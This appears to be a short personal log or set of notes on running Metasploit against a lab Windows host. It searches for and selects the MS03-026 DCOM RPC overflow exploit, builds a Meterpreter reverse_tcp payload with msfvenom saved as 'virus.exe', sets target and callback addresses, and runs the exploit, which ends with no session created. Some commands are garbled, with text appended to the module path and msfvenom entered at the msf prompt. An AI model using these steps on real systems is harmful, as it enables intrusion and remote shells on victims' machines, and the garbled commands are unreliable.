(likhitdc@Admin):                  #to open metasploit
msfconsole                    

msf6:
search Microsoft Windows RPC

0...................
1.. exploit/windows/dcerpc/ms03_026_dcom OM Interface Overflow

msf6>
use exploit/windows/dcerpc/ms03_026_dcom OM Interface Overflow

msf6> exploit(windows/dcerpc/ms03_026_dcom)
show options 
..
RHOSTS
RPORT
..

msf6> exploit(windows/dcerpc/ms03_026_dcom)
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.0.2.15 LPORT=4444 -o virus.exe

msf6> exploit(windows/dcerpc/ms03_026_dcom)
set RHOSTS 10.0.2.4

msf6> exploit(windows/dcerpc/ms03_026_dcom)
set LHOST 10.0.2.15

msf6> exploit(windows/dcerpc/ms03_026_dcom)
set payload windows/x64/meterpreter/reverse_tcp

msf6> exploit(windows/dcerpc/ms03_026_dcom)
run

[*]...
[*]...
[*]...
[*]...
[*]Exploit complete but no session was created



